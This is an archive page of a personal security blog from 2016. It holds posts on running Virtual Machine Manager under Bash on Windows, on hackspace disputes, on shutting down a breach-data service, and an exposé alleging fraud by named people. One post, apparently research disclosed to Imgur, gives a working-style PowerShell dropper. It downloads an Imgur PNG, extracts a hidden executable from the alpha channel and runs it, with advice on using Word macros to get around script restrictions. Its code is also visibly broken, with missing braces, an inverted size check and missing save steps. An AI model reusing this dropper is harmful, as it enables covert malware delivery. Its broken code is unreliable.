Tuesday, 20 December 2016

Windows 10, Virtual Machine Manager, and KVM

I really, really like the fact that Microsoft has embraced Linux in the form of releasing Ubuntu on Windows. To me, it's probably the first Linux on the desktop solution that was as good as using Linux itself without having to worry about using virtualization for my Windows applications and games. However, it's not exactly a true Linux kernel running behind the scenes and there are other things that will not simply work.

For one, out of the box you cannot use any X11 applications without an X server installed and some extra configuration. However, it is relatively painless to get this up and running and just as easy to get Virtual Machine Manager working as well. If you already have access to the KVM tools on the VM host, you will be able to use it remotely using an SSH connection from the Windows computer.

This is what we're going to need to install:

  • OpenSSH Client
  • Virtual Machine Manager
  • Python Spice GTK module

Assuming that you have already gone ahead and updated and configured Windows 10 to use the feature, you'll want to use Xming to act as your X server. There are other X servers you can consider, including MobaXterm and XvxSrv, but I prefer Xming due to its simplicity and the fact that it sits in the tray once you launch it.

Running XLaunch after installing Xming brings up this screen. Personally, I prefer having it set to multiple windows but of course you'll want to set this to your liking. You can leave the rest as defaults and it should be fine.

With the X Server out of the way, we'll want to configure Bash on Windows to automatically connect to the X server. This can be done by editing the .bashrc file in your home directory with the following at the end:

export DISPLAY=:0

Close and reopen Bash on Windows and it is ready to go. You can test out whether or not it works by installing something like GEdit or Xterm to see if it launches.

We do however have to enable D-Bus for use as Virtual Machine Manager depends on it. We can do this real quickly by performing the following command:

sudo sed -i 's$<listen>.*</listen>$<listen>tcp:host=localhost,port=0</listen>$'\ 

Once this is done we can now proceed to install VMM.

sudo apt-get install python-spice-client-gtk virt-manager openssh-client
This shouldn't take too long and once it's done all we have to do is type the following command:


And here we are!

It should be noted that you cannot create virtual machines on your Windows 10 computer using this method--you're better off using HyperV if you want to go down this road. However, it is at this point that we can connect to a KVM host using SSH.

You'll want to configure OpenSSH within Bash on Windows first with key-based authentication to proceed but once that is done it's relatively simple to configure the system. Under the File menu, you'll see Add Connection which will ask you for some details:

You should see your VMs populate now:

And you can even use them as a console:


Friday, 2 December 2016

Going viral on Imgur with Powershell and PNG

A few months ago, Kaspersky put out some research into using PNGs to distribute malicious payloads where malware authors had been embedding PE files into the images themselves. The give-away that something was amiss was the images had a 63x48 pixel resolution but were sized at 1.3 MB.

This isn't very stealth and there are ways to do this better.

Encoding a file within a PNG

First, it helps to understand a PNG file. Unlike JPEG, PNG is lossless even though it is compressed, meaning that when you create an image in the format, it retains the data that it has been generated until the resolution or colour pallette is modified. Unlike a GIF, a PNG file handles transparency through an alpha channel instead of colour substitution.

It's this compression and the alpha channel that will enable us to embed data into a PNG. Each pixel is represented by three 8-bit values for colour and another 8-bit values for transparency level (referred to as an "alpha channel"). This means that each pixel would be presented as R, G, B, and A with values from 0-255 on each.

Here's a sample image (sourced via Wikipedia) with what I am talking about:

This image is 800x600 pixels with 8-bit colour and an alpha channel, meaning that we have 480,000 pixels, or 468 KB of data that we can place within. Let's use Pillow and Python to mess with this.

Using the above script is relatively straightforward:

from PIL import Image
from sys import argv
from base64 import b64encode

i = argv[1]
o = argv[2]
with open(argv[3], 'rb') as f:
    text = f.read()

img_in = Image.open(i)
img_pad = img_in.size[0] * img_in.size[1]
text = b64encode(text)
if len(text) < img_pad:
    text = text + '\x00'*(img_pad - len(text))
    print('File is too large to embed into the image.')
text = [text[i:i+img_in.size[1]] for i in range(0, len(text), img_in.size[1])]

img_size = img_in.size
img_mode = img_in.mode
img_o = Image.new(img_mode, img_size)

for ih, tblock in zip(xrange(img_in.size[0]), text):
    for iv, an in zip(xrange(img_in.size[1]), [ord(x) for x in tblock]):
        x, y, z, a = img_in.getpixel((ih, iv))
        pixels = (x, y, z, an)
        img_o.putpixel((ih, iv), pixels)


Executing it is as follows:

$ python encode.py image.png image_out.png payload.dat

When it runs, it ensures that the payload is not larger than the image can handle then encodes it using Base64 then pads it with null bytes until it reaches the size of the total number of pixels. Then the process of replacing each alpha channel value with the value of the character in the encoded data is done and then saved to disk.

Let's embed an image into an image shall we!

Inside of this image I've encoded a JPEG within it. The image has obviously changed towards a bit of a softer look with some jankiness in the transparency but you'd normally never think of it being suspicious. With some changes to the encoding process it is possible to make the alpha channel blend in a lot more naturally.

For the curious, this is the image that was embedded within:

This Python script can retrieve the data out of the image:

from PIL import Image
from sys import argv
from base64 import b64decode

i = argv[1]
o = ''
s = argv[2]

img = Image.open(i)

for x in xrange(img.size[0]):
    for y in xrange(img.size[1]):
        p = img.getpixel((x, y))
        p = p[-1]
        o = o + chr(p)

o = o.replace('\000', '')
o = b64decode(o)

with open(s, 'wb') as f:

We can confirm that nothing is lost by running these commands:

$ md5 blog_sample.png
MD5 (blog_sample.png) = 694ab6d3260933f75dec92ba01902f9b
$ python encoder.py blog_sample.png blog_sample.out.png antivirus.jpg
$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ md5 antivirus.jpg
MD5 (antivirus.jpg) = 84893c561288b6a1a9d76f399a89d51b
$ python decoder.py blog_sample.out.png antivirus.orig.jpg
$ md5 antivirus.orig.jpg
MD5 (antivirus.orig.jpg) = 84893c561288b6a1a9d76f399a89d51b

As you can see the file contents do not change by the embedding of data within the image's alpha channel.

Let's use Imgur and Powershell to abuse this

Since its debut on Reddit, Imgur has become one of the largest image hosting services. This is largely due to its ease of access in uploading images without requiring anyone to create an account.

In tests, Imgur does appear to strip out data that doesn't belong to an image. That is, you cannot use a old technique where you combine a zip file with a JPEG or PNG on their service as it appears to outright strip the data.

Since we know that it'll remove these hybrid files, the question then becomes whether it removes the data we encode as demonstrated earlier. Let's try uploading the sample image from earlier and check.

$ md5 blog_sample.out.png
MD5 (blog_sample.out.png) = 10a4fd1bf52d0bfa50ced699f8c53c39
$ wget https://i.imgur.com/Oj8FhU5.png
--2016-11-24 13:56:50--  https://i.imgur.com/Oj8FhU5.png
Resolving i.imgur.com...
Connecting to i.imgur.com||:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 664208 (649K) [image/png]
Saving to: 'Oj8FhU5.png'

Oj8FhU5.png               100%[====================================>] 648.64K  2.42MB/s   in 0.3s

2016-11-24 13:56:51 (2.42 MB/s) - 'Oj8FhU5.png' saved [664208/664208]

$ md5 Oj8FhU5.png
MD5 (Oj8FhU5.png) = 10a4fd1bf52d0bfa50ced699f8c53c39

As we can see here, the file from earlier was uploaded to Imgur has not been altered.

So where do we go from here? How is this useful? Well to start, the thing that Imgur is great for is that you do not need to sign up with an account to upload an image. Why not use it to distribute malware without having to provide too many details?

One thing to be concerned about is that you have to have the ability to retrieve the PNG image and then process it as while there have been code execution issues with PNG libraries in the past, for the most part just loading a payloaded-image is unlikely to result in compromise.

Fortunately, Windows has built-in functions that straight up let you work with an image and extract the pixel data. This can be achieved using Powershell without any additional modules. The code is as follows:
Add-Type -AssemblyName System.Drawing 
Add-Type -AssemblyName System.Text.Encoding

$strURL = "http://i.imgur.com/nckqSN1.png"
$strFilename = "c:\temp\payloadb64.png"
$peOutputFile = "c:\temp\calc.exe"

Invoke-WebRequest -Uri $strURL -OutFile $strFilename

$image = [System.Drawing.Image]::FromFile($strFilename)
$peBase64 = @()
for ($w=0;$w -lt $image.Width;$w++)
    $row = @()
    for ($h=0;$h -lt $image.Height;$h++)
        $pixel = ($image.GetPixel($w,$h)).A
        $pixel = [convert]::toint32($pixel, 10)
        $pixel = [char]$pixel
        $row += $pixel
    $peBase64 = $peBase64 + $row 

$peImage = @()
foreach ($peValue in $peBase64)
    if ($peValue -ne "`0")
        $peImage = $peImage += $peValue

$peImage = [System.Convert]::FromBase64String($peImage)
[System.IO.File]::WriteAllBytes($peOutputFile, $peImage)
& $peOutputFile
The script works as follows:
  1. Download a PNG from Imgur and save it to disk
  2. Using System.Drawing, read every pixel and extract the alpha (A) value
  3. Ensure that all null values (0x00) are stripped from the array
  4. Decode Base64 and write file to disk
  5. Run the newly decoded file as an executable
And based on the above code, it of course executes calculator:

Executing the above code does require that your system's policy to allow the execution of Powershell scripts. That said, while on most home computers this is not an issue as it is disabled by default, many enterprise environments require this to be on. A way around any restrictions could be to execute the code with the help of VBScript and perhaps storing all of this within a Word macro.


One thing to keep in mind is that while the attack was done using Powershell, it doesn't mean that you couldn't achieve this with a Word document with an embedded macro. Avoiding executing any unwanted code is really the best way to go about avoiding this from an enduser perspective.

Imgur's response

Imgur did get back to me stating that while informative there isn't an immediate need to fix the issue due to the impact it presents.

Last Remark

I want to make it clear here that what I am showing with embedding data through a stenographic process is far from new, as it was one of the many challenges at this year's CSAW CTF qualifiers. It is a relatively common practice and there are many guides out there to read and software suites to use.

Also, yesterday, PortSwigger posted an article on doing something similar using JPEG files that was rather interesting.

Thursday, 1 December 2016

A follow up on Vancouver Hack Space

A few weeks ago, I penned an entry on my thoughts about the direction Vancouver Hack Space (VHS) had gone and what lead to my decision to ultimately leave it. My opinion about the matter has not changed but there were comments left and I would like to reply to them.

I should be clear that I am not going to direct the replies necessarily at the commenters themselves, so please forgive me if you feel like I am finger pointing at any specific individuals.

I think it's interesting that you're pining for a VERSION of VHS, rather than evaluating what VHS has become. It's entirely valid to feel that what you're personally looking for in a hackspace is no longer found at VHS, but personally I think that the "be everything to everyone" attitude is a great model.

The reason for why I left the space was primarily because it was having a larger toxic element to it than it did before and there were individuals who felt like it was better to have a top-down approach to dealing with matters than a consensus approach where everybody who was a member had a say in things.

The "be everything to everyone" model was something that creeped into VHS over time and lead to being too inviting, meaning that while we wanted people who didn't know anything to learn, we didn't want people who didn't want to learn to join. There are people at VHS now who do nothing more than exist as a VHS member, adding no value other than saying that they're a member or to occupy space for a hobby that is hard to get into--such as the amateur radio station.

If you prefer a version of VHS yourself that is losing over a dozen members each month based on how I describe it then so be it. I am not sure why you'd want a space that allows members who engage in harassment towards others with little resolve but whatever keeps you happy I guess. Your space is not immune from criticism just as much as my opinion isn't either.

He's since been banned from the space for stealing VHS property (a web domain) and continues to (in my opinion, though he's at least polite about it) harass current and potential members on social media "warning" them about the toxic environment, that he himself has created.

I'm glad to hear that the space has taken steps to ban someone from the space for stealing a domain, but am dismayed that you see his opining on how toxic the environment constitutes as harassment. If he (like myself) believes that something is toxic to be part of, he has every right to tell someone about it. This is not harassment.

If VHS were truly about stopping harassment, it needs to look within. I was corrected on the membership status (or lack there of) of the individual I mentioned in my original piece, but he is still actively a part of the space and is encouraged to be there by the same individual who was harassing the person that VHS had banished. This to me is enough to say that VHS is a toxic space.

Banning someone from the space is only required when you're dealing with real problems. Someone who has been banned from other groups and is harassing members (such as myself) should be an immediate ban. Someone who has had the cops called on them at the space and has possibly been involved in the destruction of a member's project should face an immediate ban. The fact that the decision to ban someone is being made but other examples are being overlooked tells me that there is a vindictive nature to the board and it's not healthy.

For the record, when I was still actively involved in VHS, this person had been banned before already and he was the second one to have been banned to begin with. The other person who was banned was banned because they came to borrow an angle grinder for the purposes of removing a bike lock for the second time in two weeks--there were other incidents that lead to this decision but this was the final straw.

As much as it pains me to say this, looking at how Noisebridge deals with this is sort of a way to learn from this all.

As for queer members, there's at least me, I agree that's not much, but from the people that I've seen coming to the open nights, it's not exactly a case of not making the space seem safe as much as perhaps not advertising the space's existence in the correct places?

I'm happy to hear that there are members of the LGBTQ community that take the time to be part of the space, but my point about how it presents itself as a bunch of white males does not change. The space doesn't need to advertise better.

VHS is a cheap place to use a laser cutter. That's about it these days. There are still some excellent people down there that only know it in its current form, and that's unfortunate. 

VHS has a tonne of good equipment and that should draw in people to use it. If you're losing so many members per month but have all of this great gear, what do you suppose the reasons behind it are?

The fact that this isn't being addressed and instead you're looking to do silly things like make a member-in-residence role where they maintain the space during its off-hours and not have to pay membership dues tells me that there are problems being overlooked. We never considered this and while there were times people were being messy with stuff being left behind out of order, it never got to the point where we needed anyone to come in and clean it up regularly.

first kudo's if you were one of the founding members of the Hackspace

This isn't the case. Vancouver Hack Space formed in early 2009, but I had joined in July that year but not at the point of its formation. You can say that I was one of the original members of the space (like the first dozen or two) but I do not count myself as a "founding member". I guess legally I can say I was a founding member as I believe I was one of the original signatories as per the Societies Act, but my memory is fuzzy on this one.

I believe that no founding member nor anyone pre-2010 is still a member of VHS in good standing.

Apparently in those days you also had to "Disclose your motives and affiliations" - number 5 on the list of "Principles of Unity"

There was a good reason for this and that was to prevent people from usurping the space and using it for their own political purposes--VHS was intended at its start to be as apolitical as it could be.

Prior to the 2010 Winter Olympics, anyone associated with any group that was against the Olympics or anything associated to it were being harassed by the RCMP and Vancouver Police Department. A number of the original members who founded the space or were part of it in its early days had found themselves either being followed or documented due to their involvement or relationship to these groups. I do know for a fact that I was being targeted even though my affiliation with these groups was purely through friendship and association--I never participated with any of these groups either and for the record I actually attended a curling match during the games.

We had instances where independent media groups had asked us to use the space so they could work on their video projects--we said no. We had people who wanted to throw some party during the Olympics--we said no. It wasn't easy but we did our damnedest to avoid being affiliated directly with any political movement.

We also suspected that the space had been bugged at one point although it is tough to say whether or it was true or if we were just being overly paranoid--it would have not been hard to hide such things in 45W and with more and more I learn about surveillance it's hard to believe otherwise.

When you joined VHS, we wanted to know why you were interested in being part of it. Was it to learn? Was it to pitch a multi-million dollar shitheap of a startup? Or was it because you wanted to make the space into something of your own?

These original rules of VHS served us well and the fact that today you proudly display a code of conduct and by-laws tells me that the space has gone from being a place that would do cool things to a place that really is a maker space and nothing more. To me, VHS has gone from being a hackerspace to a non-profit tech shop--the front page proudly demonstrates that by stating "[the] community garage for a community without garages".

There is nothing wrong with it becoming this, but it would be less of a problem to me if the element of harassment was dealt with appropriately and it kept the same diversity it had when VHS was really at its peak in 2012/2013.

My other comment is about the wall in the "Bunker" space - it was there for a reason, that being to keep dust out of the common area and also reduce the noise - not to segregate one activity from another.

I know why the wall was put up and completely understand this. My point was a philosophical one.

I want to say openly that there are people who are still involved with VHS that I still respect and I do hope that while I am lambasting what it has become that they don't see me as someone who is engaging in harassment towards it and its members.

Closing off, I have had a few members reach out to me about my opinions and I do want to address two things.

For one thing, I was corrected that the harassing individual is not listed as a member of the space. While I am happy to hear this, I still believe that his existence at the space on some sort of interval is a symptom of the problems the space is facing that ultimately lead to me not wanting to be around. The fact that he is associated (either as an acquaintance or an actual friend I do not know) with the individual that had the VPD called on them is even more alarming.

Secondly, while I appreciate being asked on how to fix the space, I actually don't want to. It's not that it can't be fixed, but VHS has sort of succumbed to the Ship of Theseus paradox, where while it's VHS in name, it's not it's not the same VHS we started off at.

I appreciate those coming out to offer their comments and asking questions, but my opinion is that VHS has become something I don't care for any longer.

Monday, 21 November 2016

Shutting down Canario

On December 16th, I intend to shut down Canario (formerly Canary)--and by “Canario”, I mean the service, not the company, of which I will explain later.

The reasons for this are simple: I am starting a new project in the new year and unfortunately cannot put effort into it without removing something else--and with that, Canario has to go.

The decision has been quite difficult because it has taught me a lot about what I can do as a single individual, but at the same time it also taught me of my limitations. I’ve had a few people work with me on Canario over the course of the past four years, but the vast majority of its heavy lifting, maintenance, development, and research has been me and me alone. Overall it has been a tiring experience, but far from anywhere near a regret and really rewarding.

The journey towards ending it started around the summertime when I was playing around with the idea of rebuilding it to be more like other services such as HaveIBeenPwned. I like how Troy Hunt has gone and made it very simple but one aspect I’ve always found lacking about it was that using it for research purposes was very limited. Having said that, his goal isn’t to provide those capabilities but rather to help inform those of when their information has been compromised and or exposed.

As I had gone about in developing this this new capability, I had been sitting on an idea completely different from Canario but kept thinking about it as just a novel idea with little additional thought. However, in September, I found myself looking into the idea a bit further, doing some research into other similar things (I am being vague here yes) that were otherwise lacking in features. I came to the conclusion that this idea would be something worth pursuing. I can make it fund itself with a lot less effort and be able to get people involved with again a lot less effort.

Circling back, Canario has four big problems for me:

  1. The type of data I am working with is never uniform and never will be. Someone posting a data dump on Pastebin or any other service is going to almost always have it in some unique format where there may be similarities to past dumps, but never enough for me to just automate to near perfection.
  2. Getting exposed data that isn’t publicly available has so many complications. I have become pretty adept at finding this data, but trying to get people to come to me with that data in the same way others have succeeded has proven to be unsuccessful on my part.
  3. Trying to get others on-board to work with me has been difficult at best. I’ve had cases where people wanted to get involved but wanted to have strings attached or where they wanted to contribute data but I wasn’t permitted to sell access to it.
  4. Other people and organisations are doing a better job than me and will continue to do so.

The latter part is really more of a sore point as I have tried to reach out to people but being that by the time I had started to do this, there were others in the space already and trying to improve what I had already done was going to be difficult.

To add to this, I was funding the project out of my own pocket and contributing my free time, so in some ways I wonder if I was being blinded by my egotism to go about it my own way and not let others interfere. One of the difficulties I had overall was trying to come up with a model that would allow it to be self-financed, but every time I’d come up with a model that could work I found it to be very onerous and likely to be of no benefit in the long term.

Having said all that, Canario taught me database design dos and don’ts (and also taught me to hate MySQL and embrace Postgres), allowed me to speak at conferences, has gotten me cited in the media, and it even gave me an opportunity to speak at Facebook to talk about threat intelligence, a topic that I have a lot of mixed opinions about.

So what next?

First of all, when I do close off the service, it’ll just be a hard shutdown. As it stands right now, I have not added any new data since November 15th and I will be leaving it all in place until sometime on December 16th. All user accounts and associated data will be permanently deleted as I do not wish to hold on to this data any further. I’ll do my best to clear up any backup data I have sitting around but for certain the live data will be gone.

All data that has been collected will no longer be available via the site--so search and data viewing will cease to function. If there are requests for copies of the database (again, without user data), I’ll consider them but likely it will not be free and will be as-is--if you plead your case on the “not free” part I’ll hear it.

Second of all, I am starting a new project and I am trying to get others involved. It’s not a pure information security project but at the same time it’s the core aspect of it. I want to make it easier for schools and small businesses to be able to do specific things. Additionally, Canario will continue as a legal entity, acting as a parent to the project.

Obviously right now I am being a bit hush-hush on this idea of mine, but if you’re interested in working with me on this and understand networking and cryptography, let me know--there’s your hint to what I am working on. Aspects of it are going to be open-source.

Monday, 14 November 2016

Why I left Vancouver Hack Space

I recently became aware a fellow former member of Vancouver Hack Space (VHS)'s blog post about alternatives to the hackerspace in light of it becoming a rather toxic environment. A few years ago, I had penned a draft piece about why I chose to leave but never bothered to publish it. After having seen someone else's disgust for what it has become, I have decided to speak up.

One way to start is to show what VHS looked like in 2009 when I had originally joined (my old iBook is visible in the shot too):

This was the first un-shared physical space that VHS occupied, a room that was barely larger than my living room being used by twenty or so people who all had the same goal in mind: do cool shit. On my first night there, I was enamoured and immediately signed myself as a member.

For me, it was the start of a lot of things: I met a lot of great people, made friends, furthered my own career, and learnt new things--it contributed to me being a better person overall. When I found myself working downtown after leaving my job in Surrey, I was able to put more time into the space and was able to leave work and go straight there to hangout.

VHS had spun up a lot of cool projects or was at least the catalyst for bigger things. The best one I can think of is Mini Maker Faire Vancouver, which otherwise may have never happened if it weren't for the space. Two startups come to mind that have changed the personal lives of members for the better and again it may have not been this way if it were not for VHS' existence.

I think that around the time that VHS started to need a new space and that there were new members coming in was the time I started to lose interest in being an active member. For a while, I would still go on a regular basis, but found myself as time went on that the space was changing and it was changing for the worst. When it left its location on Hastings Street for a larger one on East 1st Avenue, it was pretty much the end for me and the place because it had already become something that it shouldn't have been.

The aforementioned blog piece I mentioned stemmed from a variety of abuses directed at someone who spoke out. This was posted to the members-only discussion forum back in May:
Someone cleaned out my locker and stole some of the items in the locker, others item ended up in the drop box. This happens between Thursday May 5th, and May 11th. My locker was not locked, but was labeled with my name and there was a note in the locker that said "[person's] locker, not free, not available"
You have a thief and an asshole at the space. More bad people.
I don't suggest leaving anything of value at the space any more.
Back when VHS was smaller, this behaviour where items were stolen was exceedingly rare to the point where it was more often things getting misplaced, borrowed, or general ignorance--and even then I am failing to remember if and when these circumstances. We were generally better at keeping assholes out of the space and I would argue that until the move away from Hastings Street that the unwritten policy for how it was done went fairly well.

An example of a toxic individual being removed successfully was one person who came to the space in 2012 for one of our Super Happy Hacker Houses (SHHH). This was a periodic event we'd host where we'd have a keg, some music, lots of people, and then the later part of the evening devoted to three minute lightning talks where one could talk about whatever cool topics we had in mind--I had previously given talks on generating tripcodes, lock-picking, and Python to name a few.

This individual that evening chose a rather thoughtless talk: stealing credit card numbers from the wireless network at the Vancouver Public Library. It didn't get too much attention as it was towards the tail end of the evening, but it continued on the IRC channel later on. I ended up calling this person out on this, citing that it was fairly idiotic from an operational security point of view to openly admit that you were looking to commit fraud. His response was to use some uncreative insults, resulting in his removal from the IRC channel and was then made aware that he was not welcomed at VHS.

I'd say that this person's story with me ended there but he would later attempt to include himself in VanCitySec a few years later, resulting in him being removed from the IRC channel as well. He was then removed from being able to attend BSides Vancouver and then finally removed from OWASP's Vancouver chapter after he went off on the organizers and the speaker after the event had concluded when someone had enough of him interrupting their conversations. At an extreme level, he even managed to get a visit by the local police after he had admitted to intrusion on the wireless networks of the local transit agency.

It didn't help that later on I found out that he was harassing a friend of mine at a local meetup.

To this day, I still get him periodically showing up in the various Freenode channels I am in, taunting me over some non-existent botnet that he suspects I run. In almost all cases he ends up getting himself removed from the channel after I realise who he is.

In fairness, I do believe that he has some rather difficult problems to overcome (I have had people show me some aspects of his personal history that were troubling), but one of the things that I have learnt is that even if you know a reason for why someone exhibits shitty behaviour towards you or someone else, it is not something you have to sign up for and you should be able to remove that person if you feel it is necessary.

The reason why I bring up this person in particular is because he was the final straw for me deciding to leave the space: he was making an appearance again and I was finding it problematic that nobody was enforcing the ban--this was before the remarks about OWASP and the local meetup I should add.

When I spoke up on the mailing list, the response I got from someone who later ended up having someone at the space call the police on them was that he had every right to be in there--funny how assholes defend other assholes. At a meeting, he was eventually formally banned but after a year the ban had apparently expired in space's own words "[person] has since expired and he is welcome back at VHS".

I recently learnt that he had joined the hackspace after another encounter with him on Freenode, citing that I was an impediment to his membership. Of course, when he was banned in the first place, I had three people contact me privately letting me know that whatever decision VHS made would influence whether or not they'd be members.

This is not the only story involving harassment that I could bring up but this one I have first-hand knowledge of. I'm also exempting his name from this entry because I do not wish to attract his attention.

One of the things I can point out is that the whole makeup of how VHS is run and operated has changed since its beginnings. I'll use this photo as an example from the 2014 AGM:

Photo: VHS AGM 2014 Group Photo

In this photo, there are twelve men. I don't take exception to seeing twelve men but I damn well know that in the past we had women as members, especially who served as board members--I'll clarify something about how this "board" works or rather used to in a bit. Hell, even the aforementioned Maker Faire event was put on for the first few years by someone who I cannot say enough good things about her in terms of creativity and organizational skills. The fact that in 2014, six years after VHS was founded that it would still show a mostly male face even though it is apparent there are female members and those from the LGBTQ community amongst the membership is downright distressing.

The board that VHS has was originally created to satisfy the requirements of the Societies Act, a law that governs non-profits and other like-minded organizations in British Columbia. I served two years on the board and we only officially met when it was time for our annual general meeting, which again was a requirement of the act. Its sole purpose was to satisfy those legal requirements and to make insurance easier for us to get, but since then the board has morphed into an overseeing eye, drafting policy and everything, which was beyond what VHS was meant to be.

All in all, by the time that the person was banned after discussion amongst members of the space, the board had become something that oversaw everything and VHS was something that it wasn't when I first joined five years earlier. The writing on the wall should have been apparent when walls were erected to keep the woodworking away from the rest of the space that things were going to change. When the ham operator group formed within VHS and wanted to form a society within the society for the purposes of getting government grants for themselves and themselves alone, I knew that my time was done.

Since then, I have visited the space once at its Cook Street location and while it definitely is still a hackerspace, the original vibe it had years prior is not there. It doesn't feel like it's doing anything challenging and while there members there I still respect and chat with periodically, I cannot say that I want anything to do with the organization.

Today, I find myself going to VanCitySec, other local security events, and am friends with people who share the same ethos that I do, but it is really saddening that a space like VHS in 2009 is no more and I believe that the only reason it died was because it wanted to be everything to everyone. The original space is something I truly miss.

Sometimes it's hard to notice that you're becoming a victim of your own success and eventually you miss the forest from the trees.

Tuesday, 17 May 2016

MyDataAngel.com is not new and is an outright scam

As evident in this KickStarter and this other one, we've seen countless snake oil being peddled to helpless people who are only looking to protect themselves on the Internet. Well, this time we have a product called DataGateKeeper (DGK), and they're looking for $25,000. Their claims are that it's anti-hacking software that provides encryption levels far more advanced than AES.

Because I hate this sort of crap, I figure it's time to document who these people are and what the product actually is. I should note that I initially wondered if it was a troll (as did Bruce Schneier), but I am now convinced that it is a scam.

I am going to refer to this as MyDataAngel.com or "MDA" as there's a tonne of confusion here due to the iterations this software has goen through. What they're selling is not only not new, it has been attempted to be sold under many different names with various other people involved.

I'd like to thank Ryan O'Horo for helping out form the timeline and provide other tidbits.

Meet the Team

Here's an image from their KickStarter:

It helps to know who these people are in order to paint a picture of what we're dealing with.

  • Raymond Talarico (CEO) - once sued over a suspected embezzlement of $30,000 (via the SEC) from a company he was formerly CEO and founder of, Raymond is the CEO of MyDataAngel.com. Formerly, he was a director of FileWarden.com, which has a relationship with MDA, until July of 2014. Talarico is also President of American Pacific Rim Commerce Group (APRCG).
  • Debra Towsley (President) - Debra has worked alongside Raymond for at least a decade and was cited in the aforementioned SEC document. She was formerly president (and later CEO) of the company Talarico founded, There are claims that she worked as Director of Marketing for Blockbuster in Florida and she has been cited as involved in several other companies. She has recently taken to scrubbing her LinkedIn profile for some reason.
  • Frank Ruppen (Chief Strategy Office) - a Harvard Business School graduate, having worked at large companies such as Proctor and Gamble (as claimed in his LinkedIn), Frank is the founder of Forward Associates, a "brand management" company whose mission statement is to provide 404 pages. I should also note that the use of "Office" in his title is not a mistake on my part.
  • Joshua Noel (Creative Director) - the creative director and likely cameraperson behind the useless videos that were incorporated into the KickStarter. Formerly a YouTube LetsPlay turned wedding videographer, Joshua now finds that his business address is being shared with MDA's.
  • Loreena Stanga (Cat Herder & Code Management) - an arts student, turned code manager for MDA. She has recently deleted her LinkedIn and Twitter accounts.
  • Jensen Dillard (Data Angel Host) - host of the dumb KickStarter videos, she left her job as an employee at a veterinarian hospital to host a fake newscast.
  • Steve Talbott (Advisory Board) - you can refer to him as "Captain Steve" as he runs a yacht tour company in the Florida Keys.
  • Chad Thilborger (Data Angel & Host) - an TV food personality who's best known for some South Floridan TV show and shoving a tonne of what I can only assume is parsley into his mouth
  • David Smith (Advisory Board) - probably one of the most generic names possible, I was unable to get any information on him so I have nothing snarky to say.
  • Frankie (Data Angel & Celebrity) - likely the most intelligent individual amongst this team as it's nothing more than a lousy skeletal model that they use as a gag prop in their videos.
There have been other people involved in the past but I will mention them as I go along. For the most part, the two people of interest should be Towsley and Talarico. I will also mention that there are no cryptographers working for them.

Update - 20-05-2016

It turns out that Talarico and Towsley are married. You can read this claim in this article from 2006:
Talarico joined family and friends in watching his filly J P Sage take the lead near the final turn and trot on to win the night's 10th race. Talarico, his wife Debra Towsley, and their group then posed with J P Sage for the traditional winner's circle photo.
This detail will help paint a picture of what is going on with this KickStarter. Thanks to Stephen Tinius for pointing out his involvement with APCRG and his relationship status with Towsley.

Before MyDataAngel.com, there were other iterations

Here are some names we should make ourselves familiar with before we go on about how the timeline makes no sense:
  • Centuri Cryptor
  • FileWarden.com
And here's an cropped copy of their KickStarter timeline up until now:

Let me give you guys a better timeline that is more factual:

1997-01-21Raymond Talarico incorporates Sci-Fi Megaplex in Fort Lauderdale, FLflorida.intercreditreport.com
1998-01-01Debra Towsley serves as VP of business development for Sci-Fi Megaplexsec.edgar-online.com
1998-07-05SOFNET, Inc. a/k/a SOFTNET, Inc. is incorporated by Raymond Talarico and Glenn Jackson in Floridasearch.sunbiz.org
2000-09-01Raymond Talarico resigns from Sci-Fi Megaplexsec.gov
2001-03-16SEC announces fraud scheme at Hawa Corporation involving future FileWarden.com director Ilona Alexis Mandelbaum of West Palm Beach, FLsec.gov
2001-01-01Raymond Talarico and Debra Towsley found Medirect Latino Inc.sec.edgar-online.com
2001-01-22Sci-Fi Megaplex files for bankruptcybizjournals.com
2001-09-21SOFNET, Inc. is dissolvedsearch.sunbiz.org
2002-01-01Raymond Talarico founds MGI Consultants Inc.companiess.com
2002-07-19MEDirect Latino, Inc. incorporated by Raymoond Talarico and Debra Towsley in Floridasearch.sunbiz.org
2003-07-22State of Wisconsin issues C&D against SOFNET, Inc., Raymond Talarico, and Glenn Jackson for selling unregistered securitieswdfi.org
2005-01-01IntelaKare Marketing Inc. a/k/a ikarma Inc.otcmarkets.com
2005-11-29Success Exploration and Resources, Inc. (SE&R), a mineral exploration company, incorporated in the State of Nevadanasdaq.com
2006-10-16Three directors resign from MEDirect Latino, Inc. citing irregularitessec.edgar-online.com
2007-02-14Ilona Alexis (a/k/a Roza) Mandelbaum files for bankruptcy in Florida Southern Bankruptcy Courtplainsite.org
2007-07-11MGI Consultants Inc. incorporated in Nevada by Debra Towsley nvsos.gov
2007-11-09MEDirect Latino Inc. goes into default with several lendersglobenewswire.com
2008-01-23HSC Holdings, LLC incorporated in Florida by Ilona Mandelbaumsearch.sunbiz.org
American Pacific Rim Commerce Group (APRM) and MGI Consultants
2010-01-01According to a LinkedIn account, Centuri Global is created and claims to come from Hobe Sound, Floridalinkedin.com
2010-05-21Fraud lawsuit filed against HSC and Ilona Mandelbaum in Texasnasdaq.com
2010-06-22Iliona Mandelbaum and HSC Holdings sued for fraud in Texas courtdockets.justia.com
2011-01-28SE&R website snapshotsuccessexploration.com
2011-02-28IntelaKare spins off Medtino Inc.otcmarkets.com
2011-06-07SEC suspends trading of American Pacific Rim Commerce Group (APRM)sec.gov
2011-10-10SEC filing connecting SE&R In Ontario and Nevadasec.gov
2012-03-15Secured Income Reserve, Inc. incorporated in Delaware, Ilona Alexis Mandelbaum and Matthew H. Sage, Executive Officersbizapedia.com
2013-07-13centuriglobal.com registeredresearch.domaintools.com
2013-07-30SE&R stock purchase agreement entered into by HSC Holdings, LLC and Matthew H. Sage, then appointed Officer and Director, Alexander and Jonathan Long resign as Executive Officersmarketwatch.com
2013-07-30SE&R change their SIC code from Metal Mining to Computer Processing and Data Preparationsec.gov
2013-08-22Centuri Cryptor demo video posted to Youtube by Nick M.youtube.com
2013-09-06Ilona Mandelbaum appointed Secretary and Director at SE&Rbloomberg.com
2013-09-11Question regarding Centuri Cryptor was posted to SpiceWorkscommunity.spiceworks.com
2013-10-04Centuri Cryptor website appears on the Internet. Matthew H. Sage is cited as COO and Henry Mandelbaum is CTO. Nick McCord is cited as software and network administrator.centuriglobal.xtreamsolution.com
2013-10-13Centuri Cryptor Twitter account createdtwitter.com
